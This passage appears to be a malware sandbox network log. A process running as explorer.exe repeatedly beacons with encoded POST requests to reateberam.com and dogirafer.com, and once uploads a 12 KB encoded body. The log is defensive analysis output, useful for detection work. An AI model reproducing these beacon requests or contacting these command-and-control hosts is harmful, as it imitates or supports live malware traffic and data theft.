14cOCueRsG13Yplaxjehm7og3NMO0PSASDCZ/2wuSXNYWmcphSGpB6yiJiVjA1oI0cseZfl7FsnAbq5sKhGspGsps047k5XG2ZL58WifW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc83Au/mIxh+abLDfHEl4MtE7VffChtC7E05NVMMO4/MfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1VRp
2024-12-02 17:41:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49940	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:30 UTC	411	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hgdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:31 UTC	792	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T5ON%2FJjCCPyhCUrWSCO%2BCQQql47gRWAJa8IiOqHToA1vH1pXxdBRKD6Fq%2BNDitXdfeOCRQUe1nM9njx%2BiT5mvfFTh0Zi990l32b3hqhEdoKvyaM1bwKK2kvpUeSKeJQWrQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1bb26d06443e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1594&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1049&delivery_rate=1784841&cwnd=194&unsent_bytes=0&cid=2f9da834fadeb4ec&ts=801&x=0"
2024-12-02 17:41:31 UTC	343	IN	Data Raw: 31 35 30 0d 0a 50 43 69 55 51 4d 47 77 33 34 70 75 5a 42 37 61 6a 47 37 6f 67 33 35 4b 4f 55 7a 65 41 79 44 43 62 66 75 33 75 69 62 50 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 73 49 55 55 74 66 35 58 6c 37 46 67 6a 44 37 65 34 73 71 52 47 74 4a 4f 70 70 73 30 36 35 45 35 57 48 47 74 45 37 4d 65 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 33 44 4f 6a 67 4b 42 70 2b 62 37 54 44 66 48 63 71 35 4d 74 48 36 31 4c 65 44 78 77 70 68 6b 45 36 4e 31 49 42 4f 73 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 42 61 51 35 Data Ascii: 150PCiUQMGw34puZB7ajG7og35KOUzeAyDCbfu3uibPYmmcphSGpB6yiJiVjA1sIUUtf5Xl7FgjD7e4sqRGtJOpps065E5WHGtE7MenfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kcw3DOjgKBp+b7TDfHcq5MtH61LeDxwphkE6N1IBOsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfBaQ5
2024-12-02 17:41:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49946	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:32 UTC	411	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hhdViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:33 UTC	793	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xu30e8k2%2BRRrqIYUNZTUTjY4el4nFGNAqjp3M29u03jSD59L6Onxf6UHNIEe12krokvKC53lWM5evrHgMqoV0sctMmzX%2FjWO6ub1lal%2FvBVuh6R%2F2ZRwUcwBSkdBgQttig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1bc069165419-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14048&min_rtt=14035&rtt_var=5272&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1049&delivery_rate=208051&cwnd=32&unsent_bytes=0&cid=57b7d534de1676ed&ts=703&x=0"
2024-12-02 17:41:33 UTC	335	IN	Data Raw: 31 34 38 0d 0a 4f 43 71 65 52 73 75 30 33 34 70 69 61 78 37 62 6a 57 54 6d 67 33 39 4b 50 55 6d 34 41 53 69 72 62 50 79 30 76 47 72 78 58 31 62 64 36 52 61 59 74 41 32 73 30 4d 44 71 74 54 56 73 4a 45 4d 75 46 5a 54 6e 67 46 63 6e 44 62 44 7a 73 71 67 44 73 5a 53 76 79 38 38 38 35 43 64 57 48 6d 6f 42 30 76 6e 46 55 79 39 7a 57 67 30 44 56 55 33 2b 6f 59 50 48 55 33 32 5a 34 54 6b 4b 4e 4a 6f 4e 39 62 77 77 6d 55 43 32 2b 4c 79 41 56 7a 63 68 36 6e 66 62 47 43 4c 41 46 38 34 35 42 34 58 6e 4b 42 6b 59 61 72 58 41 4e 6e 59 70 35 59 64 47 67 56 48 64 43 52 35 47 69 6b 31 78 44 47 46 74 58 50 44 6a 44 4a 72 56 53 58 43 45 4f 6e 48 6a 43 69 4c 43 59 6c 77 52 49 69 50 73 32 78 73 39 53 4c 34 64 79 74 57 54 67 72 51 44 53 71 6a 5a 2f 73 76 72 4e 2f 4a 52 4b 5a Data Ascii: 148OCqeRsu034piax7bjWTmg39KPUm4ASirbPy0vGrxX1bd6RaYtA2s0MDqtTVsJEMuFZTngFcnDbDzsqgDsZSvy8885CdWHmoB0vnFUy9zWg0DVU3+oYPHU32Z4TkKNJoN9bwwmUC2+LyAVzch6nfbGCLAF845B4XnKBkYarXANnYp5YdGgVHdCR5Gik1xDGFtXPDjDJrVSXCEOnHjCiLCYlwRIiPs2xs9SL4dytWTgrQDSqjZ/svrN/JRKZ
2024-12-02 17:41:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49953	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:34 UTC	411	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hudViRxTPtzmAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:35 UTC	794	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mJUPX3Qeb%2FkfkZCyqiLK%2BCV8yOpol7X17hkpjjvQQ5GhHrWb%2FbL4cQXazAtgipEbjnTMn6mQQAUzhFvbsGgpUEYbLdieELgyQaOAYVcyycm0v3o%2BweCR7%2Fh1XJUQUCIvFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1bcf3c6643f1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1581&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1049&delivery_rate=1780487&cwnd=214&unsent_bytes=0&cid=227a97beefc5ed9e&ts=752&x=0"
2024-12-02 17:41:35 UTC	335	IN	Data Raw: 31 34 38 0d 0a 50 43 75 65 52 73 65 30 33 6f 70 6e 5a 52 2f 61 68 57 50 6b 67 33 56 4e 50 6b 33 52 61 79 4b 72 5a 76 79 36 75 79 53 41 57 42 2f 53 34 42 4b 4c 73 77 71 79 6b 63 66 54 74 44 46 75 4a 6b 34 73 63 2f 7a 67 68 6c 59 6e 43 62 53 38 2f 61 51 50 73 5a 53 70 6f 63 74 52 36 43 4a 54 47 32 59 42 30 76 6e 46 55 79 39 7a 57 67 30 44 56 55 33 2b 6f 59 50 48 55 33 32 5a 34 54 6b 4b 4e 4a 6f 4e 39 62 77 77 6d 55 43 32 2b 4c 79 41 56 7a 63 68 36 6e 66 62 45 43 66 45 45 4d 6b 78 61 2b 6a 71 49 52 73 52 61 72 4f 4d 66 33 4d 76 35 6f 35 48 36 44 33 61 44 78 74 44 67 55 39 78 44 47 46 74 58 50 44 6a 44 4a 72 56 53 58 43 45 4f 6e 48 6a 43 69 4c 43 59 6c 77 52 49 69 50 73 32 78 73 39 53 4c 34 64 79 74 57 54 67 72 51 44 53 71 6a 53 2b 38 33 6a 4f 50 42 58 4b 5a Data Ascii: 148PCueRse03opnZR/ahWPkg3VNPk3RayKrZvy6uySAWB/S4BKLswqykcfTtDFuJk4sc/zghlYnCbS8/aQPsZSpoctR6CJTG2YB0vnFUy9zWg0DVU3+oYPHU32Z4TkKNJoN9bwwmUC2+LyAVzch6nfbECfEEMkxa+jqIRsRarOMf3Mv5o5H6D3aDxtDgU9xDGFtXPDjDJrVSXCEOnHjCiLCYlwRIiPs2xs9SL4dytWTgrQDSqjS+83jOPBXKZ
2024-12-02 17:41:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49956	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:37 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hvdViRxTPtzGAYfxODCSSuZ/ixuVPIFlepnGOM0WzS6oybw0EcJUYteOH33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCai2cFhEPuKCKywztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 12228 Cache-Control: no-cache
2024-12-02 17:41:37 UTC	12228	OUT	Data Raw: 4c 48 54 64 46 35 33 74 6a 37 77 78 62 6d 69 35 78 51 36 78 71 48 4d 55 61 45 6d 44 54 6c 6a 59 4d 35 2f 4c 79 31 69 4b 4e 33 6a 4c 33 41 33 35 74 79 61 35 68 5a 69 70 34 7a 56 71 57 44 52 39 65 75 69 59 38 43 39 31 61 38 57 32 2b 2f 56 35 77 65 7a 47 77 38 6c 69 6c 46 4a 51 53 78 38 55 6e 6f 62 5a 51 6c 64 48 61 6c 51 2b 53 48 44 4a 35 5a 65 78 46 52 4f 65 7a 52 74 4b 4e 72 51 42 78 71 67 55 38 30 79 2b 32 73 65 66 53 77 6f 42 6c 45 6d 56 65 48 6d 56 61 72 74 43 5a 62 6d 2b 66 56 68 34 42 4d 33 46 41 77 52 50 6f 74 51 50 6e 44 61 4a 62 33 4d 62 30 69 46 71 5a 69 4a 37 4f 74 76 38 47 65 72 63 61 45 66 45 4c 55 36 77 5a 48 6a 76 54 67 38 66 48 79 76 4c 38 43 70 36 61 72 59 35 6f 4a 53 41 71 34 64 35 49 50 53 69 70 34 75 4a 58 49 59 57 50 2b 53 6e 45 6d 58 Data Ascii: LHTdF53tj7wxbmi5xQ6xqHMUaEmDTljYM5/Ly1iKN3jL3A35tya5hZip4zVqWDR9euiY8C91a8W2+/V5wezGw8lilFJQSx8UnobZQldHalQ+SHDJ5ZexFROezRtKNrQBxqgU80y+2sefSwoBlEmVeHmVartCZbm+fVh4BM3FAwRPotQPnDaJb3Mb0iFqZiJ7Otv8GercaEfELU6wZHjvTg8fHyvL8Cp6arY5oJSAq4d5IPSip4uJXIYWP+SnEmX
2024-12-02 17:41:37 UTC	795	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FqPn851msKBie1gKIjBCwcIl98oVmWapISCDIZtp9ld89zvkX%2Bq2HxdXmAPYEGbp%2FCQNn5FESJbXFrhOR3D64K2JDfKB31hOkW4osIl0ksiHwYgxut5TI78Y9%2BDUd3Zr8w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1bdbbdaaab2d-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13917&min_rtt=13869&rtt_var=5235&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13325&delivery_rate=210541&cwnd=32&unsent_bytes=0&cid=d2c3df35657605a4&ts=835&x=0"
2024-12-02 17:41:37 UTC	574	IN	Data Raw: 32 34 34 0d 0a 50 43 53 62 51 38 71 30 33 34 70 69 59 78 37 51 68 6d 2f 68 67 33 4e 4e 50 30 72 66 42 55 36 71 61 2f 36 36 76 53 48 4b 4b 52 69 62 6e 6d 54 35 31 47 6e 54 37 5a 58 74 74 54 64 71 4a 6b 59 72 4e 70 76 6e 68 56 30 6d 43 4c 54 51 74 36 67 50 73 70 43 73 36 50 55 45 35 53 64 54 48 32 4e 4d 36 71 79 6d 4e 6c 41 54 46 51 35 49 51 51 47 34 34 38 66 4d 52 51 33 63 73 6d 74 49 5a 38 6c 64 2b 39 42 58 67 68 76 71 72 61 4c 48 41 78 74 68 2f 55 72 6e 48 69 48 4c 58 38 45 30 41 75 4c 6c 4a 52 78 2b 62 62 54 4a 65 48 51 74 35 73 74 37 31 46 66 65 43 52 70 42 68 30 35 53 4e 46 34 50 4f 6f 71 4a 51 74 65 59 46 44 58 43 66 44 76 6f 65 6a 69 66 4f 51 74 4d 61 48 54 32 73 32 4d 6e 47 65 64 42 31 5a 48 4f 72 76 4d 65 63 35 50 63 2f 4d 32 76 50 50 52 62 51 5a Data Ascii: 244PCSbQ8q034piYx7Qhm/hg3NNP0rfBU6qa/66vSHKKRibnmT51GnT7ZXttTdqJkYrNpvnhV0mCLTQt6gPspCs6PUE5SdTH2NM6qymNlATFQ5IQQG448fMRQ3csmtIZ8ld+9BXghvqraLHAxth/UrnHiHLX8E0AuLlJRx+bbTJeHQt5st71FfeCRpBh05SNF4POoqJQteYFDXCfDvoejifOQtMaHT2s2MnGedB1ZHOrvMec5Pc/M2vPPRbQZ
2024-12-02 17:41:37 UTC	13	IN	Data Raw: 37 6a 54 76 42 39 6e 52 2b 4e 7a 0d 0a Data Ascii: 7jTvB9nR+Nz
2024-12-02 17:41:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49962	104.21.16.251	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:39 UTC	415	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWuehdE1VOeWVOCBw+dQZsw== User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: reateberam.com Content-Length: 0 Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49967	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:41 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnYwqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:42 UTC	785	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKnWscwM%2FZ59k8Btx3yoiebky1zYKiIn9XlvNMGiZ2h5hc95DRDSjqJ4oiSWJJGjfXpT7KhYEVr5oswRL5AkSiCRQ24%2B120Dc9dmwky%2BtKKpSzSJu3QCaWJo%2Fp01GZVI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1bf5faf98c63-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1857&min_rtt=1857&rtt_var=696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1571582&cwnd=223&unsent_bytes=0&cid=92ecf69bcf92d84f&ts=1591&x=0"
2024-12-02 17:41:42 UTC	339	IN	Data Raw: 31 34 63 0d 0a 4d 69 6d 63 51 4d 75 36 30 59 70 6a 5a 52 54 5a 68 32 2f 69 67 33 35 4c 4f 45 4c 54 41 69 54 43 61 76 61 7a 76 69 62 45 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 76 49 6b 38 75 65 5a 4c 70 37 46 63 6e 43 72 71 33 74 61 64 47 74 35 4b 74 72 4d 34 2f 37 45 35 52 47 57 46 4e 36 73 53 6a 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6b 34 41 75 33 6e 49 52 39 2b 61 37 48 41 66 33 6b 76 37 73 74 50 37 6c 66 63 41 52 74 50 37 45 41 34 4e 46 38 4c 50 63 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 42 61 51 35 Data Ascii: 14cMimcQMu60YpjZRTZh2/ig35LOELTAiTCavazvibEYmmcphSGpB6yiJiVjA1vIk8ueZLp7FcnCrq3tadGt5KtrM4/7E5RGWFN6sSjfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kck4Au3nIR9+a7HAf3kv7stP7lfcARtP7EA4NF8LPcC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfBaQ5
2024-12-02 17:41:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49974	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:44 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:45 UTC	784	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fcFxbMzGpkqKqnNn%2Bxr66VKi2Uo7P04WxALl0DvLG6r%2FyZyYowcBg9PIuDIOLQ1zusrw0yUP7d8wy5%2BicmPwtHyLtWAarkL7KILb4TSOIDjTQVqidJi02hJ5pBSoZQ8u"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1c08cdb6369d-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14334&min_rtt=14328&rtt_var=5386&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=203045&cwnd=32&unsent_bytes=0&cid=7db1e0a894fe8e05&ts=1622&x=0"
2024-12-02 17:41:45 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 79 79 5a 51 38 4b 37 33 49 70 6c 59 78 37 52 68 32 37 6f 67 33 39 4f 4f 45 33 53 44 53 62 43 61 2f 6d 32 75 53 48 49 4b 52 69 62 37 78 75 50 6f 41 32 31 6a 34 62 55 69 7a 46 73 4c 6b 59 70 66 70 53 4f 67 46 38 6c 43 62 4f 37 73 2b 30 4e 75 70 75 70 6f 38 34 33 67 69 42 63 48 32 70 4e 36 73 58 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 4d 73 79 42 65 6a 71 4b 48 4d 5a 61 72 58 49 63 6e 55 75 71 34 42 46 37 6c 4c 59 44 68 73 70 67 55 38 30 4d 6c 30 4a 4e 38 43 39 65 76 37 37 62 56 65 4d 65 33 36 78 55 58 6e 57 66 67 46 58 66 79 62 6c 32 51 42 68 53 72 63 56 6c 34 2b 56 6e 71 30 44 4d 38 65 5a 76 39 50 65 42 66 5a 53 51 70 Data Ascii: 150OyyZQ8K73IplYx7Rh27og39OOE3SDSbCa/m2uSHIKRib7xuPoA21j4bUizFsLkYpfpSOgF8lCbO7s+0Nupupo843giBcH2pN6sXsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EMsyBejqKHMZarXIcnUuq4BF7lLYDhspgU80Ml0JN8C9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfZSQp
2024-12-02 17:41:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49982	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:47 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-02 17:41:48 UTC	784	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 17:41:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWoHgVov3BiNyOiHwaLIptgOQqGgpUDkzQT9j%2BOmX6qlf6jNFFHCRREkgQ3tDDvOOKm8qJAoiMQLcoupP2%2BRNeH%2FhaJxSSs%2Fb37kMNhICPQzQH1wWPbJUFb3g5WsSg83"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebd1c1b4d71437f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1717&rtt_var=669&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1604395&cwnd=78&unsent_bytes=0&cid=201a70462e1a6489&ts=1599&x=0"
2024-12-02 17:41:48 UTC	343	IN	Data Raw: 31 35 30 0d 0a 4f 43 32 65 52 63 71 31 32 49 70 6c 5a 42 2f 5a 67 6d 4c 6c 67 33 56 4f 4f 45 6a 51 41 53 58 43 62 76 75 37 74 69 48 4d 62 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6e 4a 30 59 6f 63 35 54 6f 37 46 6f 6a 44 62 47 34 73 36 42 47 75 70 4f 73 70 73 34 36 35 55 35 51 48 32 56 4c 36 63 65 6a 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 73 31 42 75 50 6e 4b 42 70 2b 62 62 66 4a 65 6e 41 72 35 63 74 50 37 56 50 65 44 52 68 44 37 45 38 2f 4d 31 4d 4a 50 34 7a 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 61 51 4a Data Ascii: 150OC2eRcq12IplZB/ZgmLlg3VOOEjQASXCbvu7tiHMbGmcphSGpB6yiJiVjA1nJ0Yoc5To7FojDbG4s6BGupOsps465U5QH2VL6cejfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kcs1BuPnKBp+bbfJenAr5ctP7VPeDRhD7E8/M1MJP4zMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1aQJ
2024-12-02 17:41:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49988	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 17:41:50 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCyobPa0vSG5YVbTlGf+p2/T7/2fw0UYVEQrfZGTlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
